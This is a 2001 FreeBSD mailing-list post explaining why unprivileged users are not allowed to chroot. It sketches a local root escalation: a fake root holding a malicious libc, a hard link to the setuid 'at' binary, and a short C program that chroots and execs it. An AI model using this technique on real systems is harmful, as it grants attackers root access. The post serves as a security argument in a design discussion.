On Thu, Oct 04, 2001 at 05:32:16PM -0600, Thierry Black wrote:
[ please don't write in HTML. Do it again and I'll drop you in a kill file.]
However, to answer the question "why don't we allow users to chroot", I
present you with:
$ mkdir -p hack/usr/lib
$ mkdir -p hack/usr/bin
$ cp evilness.so hack/usr/lib/libc.so
$ ln /usr/bin/at hack/usr/bin
$ cat hack-a-tack.c
#include <unistd.h>
int main (void) { chroot("hack"); exec ("/usr/bin/at", "/usr/bin/at", NULL);}
$ gcc -o hack-a-tack hack-a-tack.c
$ ./hack-a-tack
Now, code I wrote is running with root privilages. While it's
clearly running in a chrooted enviroment, you can still do
Very Bad Things.
(This, of course, assumes that you have write permissions somewhere
on the same file system as a suid program. This is probably true
on many systems)
--
Mike Bristow, seebitwopie
To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-hackers" in the body of the message
